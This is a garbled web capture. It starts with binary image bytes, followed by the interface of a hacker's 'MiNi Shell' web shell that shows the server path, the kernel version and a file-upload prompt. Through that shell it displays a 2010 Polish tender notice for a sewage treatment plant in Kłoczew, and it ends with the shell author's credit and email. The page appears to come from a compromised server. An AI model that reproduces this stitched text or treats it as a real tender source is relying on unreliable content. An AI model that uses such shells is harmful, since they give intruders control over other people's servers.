JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100426/116536-N-2010.html

<p class="kh_header"><b>Kłoczew: Budowa gminnej oczyszczalni ścieków w Kłoczewie</b><br>
<b>Numer ogłoszenia: 116536 - 2010; data zamieszczenia: 26.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kłoczew , ul. Długa 67, 08-550 Kłoczew, woj. lubelskie, tel. 025 7543199, faks 025 7543199.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kloczew.netbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa gminnej oczyszczalni ścieków w Kłoczewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest  budowa  gminnej  oczyszczalni  ścieków  na  działkach  o numerach  ewidencyjnych  1243/4, 1243/9  w  miejscowości  Kłoczew  gm. Kłoczew obejmująca w szczególności następujący zakres rzeczowy:
Obiekty wzdłuż linii ścieków surowych:

1.   Przepompownia  ścieków  surowych  z  komorą  kraty  mechanicznej  szczelinowej schodkowej  -  budowana  przepompownia  wraz  z  komorą  kraty  mechanicznej zlokalizowana  będzie  w  części  podziemnej  budynku  wielofunkcyjnego.  Komora wykonana  w  konstrukcji żelbetowej.  Część  nadziemna  urządzeń  znajduje  się  w wydzielonym pomieszczeniu.
2.    Budynek wielofunkcyjny	- obiekt	kubaturowy nowy, jednokondygnacyjny posadowiony na konstrukcji  reaktora. Konstrukcję stanowi wiata typu lekkiego o konstrukcji stalowej ocynkowanej, pokryta płytami warstwowymi. 
Budynek wyposażony w instalacje:	
- elektryczną,
- wod.-kan.,	
- wentylacyjną.
	
Obiekt wielofunkcyjny obejmuje następujące elementy - pomieszczenia:
a)   administracyjno-socjalne,
b)   gospodarki osadem ze stacją mechanicznego odwadniania osadu nadmiernego,
c)   warsztatowo - magazynowe,
d)   sterownię z energetyczną rozdzielnią, 
e)   szatnie przechodnią,
f)    laboratorium, 
g)   komunikację.

3.  Reaktor   z   separatorem   fluidalnym   2x70   -   instalacja   technologiczna   reaktora zostanie  zamontowana  w  jednej  komorze  wybudowanych  komór żelbetowych  o wymiarach 5m x 10m x 5,1m szt.2, dla dwu niezależnych ciągów technologicznych .  Obiekt  reaktora  przykryty dachem  w  konstrukcji stalowej ocynkowanej z   pokryciem  płytą warstwową.  Posadowienie konstrukcji  w  pół  -wykopie  -nasypie.  Każdy  z  ciągów  będzie  posiadał  wydzielone strefy:
a)    denitryfikacji  -  ze  swobodnym  przepływem  mieszaniny  ścieków  do  strefy nitryfikacji,
b)    nitryfikacji - z elementem wydzielonej strefy separatora fluidalnego.

4.  Gospodarka   osadami   -   osad   czynny   nadmierny   magazynowany   w   zbiorniku magazynowania osadu nadmiernego z przeznaczeniem do	odwodnienia mechanicznego na stacji odwadniania z prasą taśmową.

5.  Punkt ścieków dowożonych - podziemny zbiornik żelbetowy o wymiarach zew. 6,0m x  6,0m  i  gł.  3,0m  z  kompaktową  stacją  zlewczą.  
Technologiczne  wyposażenie stanowią : pompa dozowania ścieków, mieszadło zatapialne.

6.  Wodociąg - przyłącze z sieci wodociągowej gminnej.

7.  Rurociągi międzyobiektowe - zostaną wykonane następujące kolektory:
a)    kolektor przyłączeniowy ścieków surowych do obiektu pompowni, 
b)    kolektor tłoczny ścieków surowych:
c)    kolektor tłoczny ścieków dowożonych, 
d)    kolektor tłoczny wody nadosadowej,
e)    kolektory dystrybucji powietrza.

8.   Zasilanie energetyczne - z linii napowietrznej zlokalizowane  w sąsiedztwie oczyszczalni.
9.   Kolektor zrzutowy ścieków oczyszczonych - zrzut ścieków oczyszczonych poprzez przelewy pilaste grawitacyjnie rurociągami do komory pomiarowej	
z przepływomierzem  elektromagnetycznym  indukcyjnym, przepompowni ścieków oczyszczonych  oraz  dalej  kolektorem  PE z wylotem do rowu melioracyjnego.

10.   Drogi  i  place  manewrowe  -  w  konstrukcji  dla  pojazdów  ciężkich  z  nawierzchnią  z kostki betonowej prasowanej,

11.   Ogrodzenie - z siatki stalowej powlekanej zawieszonej na słupkach stalowych, wys. 1,5 m,

12.   Dostawa agregatu prądotwórczego.

Przedmiot zamówienia szczegółowo opisany jest w dokumentacji projektowej,
a  także  w  specyfikacji  technicznej  wykonania  i  odbioru  robót  stanowiących  integralną  część  SIWZ. Wykonawca  zobowiązany  jest  do  wykonania  wszystkich  robót  wymienionych  w  SIWZ  i załącznikach do SIWZ, których efektem będzie w pełni sprawna oczyszczalnia ścieków..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.21-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta  musi  być  zabezpieczona  wadium  w  wysokości  20  000  zł  (  słownie złotych : dwadzieścia tysięcy).

2. Wadium należy wnieść przed upływem terminu składania ofert. Wadium musi obejmować cały okres związania ofertą.

3. Formy i miejsce wnoszenia wadium.
Wadium wnoszone w pieniądzu powinno być wpłacone przelewem na konto zamawiającego  nr  50 8724 1028 2003 2800 0143 0002,  natomiast  wadium wnoszone  w  pozostałych  dopuszczalnych  formach  wymienionych  w  art.  45 ust. 6 ustawy p.z.p.  tj. poręczeniach   bankowych lub poręczeniach spółdzielczej   kasy  oszczędnościowo-kredytowej,  gwarancjach  bankowych, gwarancjach   ubezpieczeniowych   oraz   poręczeniach   udzielanych   przez podmioty,  o  których  mowa  w art.  6b  ust.  5  pkt  2  ustawy  z  dnia  9  listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.) powinno być złożone najpóźniej w dniu 14 maja 20109 r. do godz. 9.50 u Skarbnika Gminy, w siedzibie Zamawiającego, pokój nr 10.
O  uznaniu   przez   zamawiającego, że wadium   w   pieniądzu   wpłacono przelewem w wymaganym terminie, decyduje data i godzina wpływu środków na rachunek zamawiającego.
Wadium  złożone  w  pozostałych  dopuszczalnych  formach  musi  zawierać zobowiązanie zgodne z art. 46 ust. 4a i 5 ustawy p.z.p. 

4. Zwrot  wadium  nastąpi  zgodnie  z  zasadami  określonymi  w  art.  46  ustawy p.z.p.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek posiadania wiedzy i doświadczenia zostanie spełniony jeśli wykonawca wykaże zrealizowanie   w   okresie  ostatnich   pięciu   lat  przed  upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 robót budowlanych obejmujących wykonanie obiektów budowlanych w konstrukcji żelbetowej o kubaturze  co  najmniej  1200  m3   wraz  z  wykonaniem  technologii  dla  jednej mechaniczno-biologicznej   oczyszczalni   ścieków   o przepustowości   co najmniej  100  m3/dobę  i  wartości  łącznej  zadania  co  najmniej   1,5 mln.  PLN brutto,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie spełniony, jeśli wykonawca wykaże dysponowanie  odpowiednio  wykwalifikowanym  personelem  w celu obsadzenia stanowisk kierowników robót. Osoby muszą posiadać wykształcenie wyższe lub średnie, uprawnienia budowlane do kierowania robotami budowlanymi w n/w specjalnościach oraz aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa,  w specjalnościach:
1.  instalacyjnej  w  zakresie  sieci,  instalacji  i  urządzeń  cieplnych, wentylacyjnych, gazowych, wodociągowych i  kanalizacyjnych - 1 osoba,
2.   konstrukcyjno - budowlanej - 1 osoba,
3.   instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych
i  elektroenergetycznych  - 1 osoba,
4. drogowej - 1 osoba,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek sytuacji ekonomicznej i finansowej zostanie spełniony, jeśli wykonawca wykaże:
1.   posiadanie  środków   finansowych   lub  zdolności  kredytowej   
      w wysokości co najmniej 2,0 mln PLN
2.   posiadanie   ubezpieczenia   od   odpowiedzialności   cywilnej w zakresie   prowadzonej   działalności   gospodarczej  związanej   z przedmiotem zamówienia na kwotę co najmniej 2 mln PLN,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Formularz oferty zgodnie z wzorem, który stanowi załącznik nr 1 do SIWZ;
2.  Kosztorys ofertowy - sporządzony zgodnie z zał. nr  9 do SIWZ;
3.  Harmonogram rzeczowo finansowy stanowiący załącznik nr 10 do SIWZ;
4.  Oświadczenia i dokumenty wymienione w pkt 6. niniejszej specyfikacji;
5   Dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub aktualny statut spółki - w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę;
6.   Potwierdzenie wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszcza się możliwość zmiany umowy w zakresie przedłużenia terminu realizacji przedmiotu zamówienia przy zaistnieniu następujących powodów:
a) warunki pogodowe uniemożliwiające wykonanie prac budowlanych,
b) zawieszenie wykonania prac niespowodowane uchybieniami Wykonawcy,
c) siła wyższa.
2. Strony dopuszczają możliwość zmiany umowy w przypadku zaistniałej konieczności wynikającej z umowy o dofinansowanie między Zamawiającym a jednostką udzielającą dofinansowania zadania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kloczew.netbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kłoczew, ul. Długa 67, 08-550 Kłoczew.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2010 godzina 10:00, miejsce: Sekretariat Urzędu Gminy Kłoczew, ul. Długa 67, 08-550 Kłoczew.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków Programu Rozwoju Obszarów Wiejskich na lata  2007 - 2013, w ramach działania Podstawowe usługi dla gospodarki i ludności wiejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com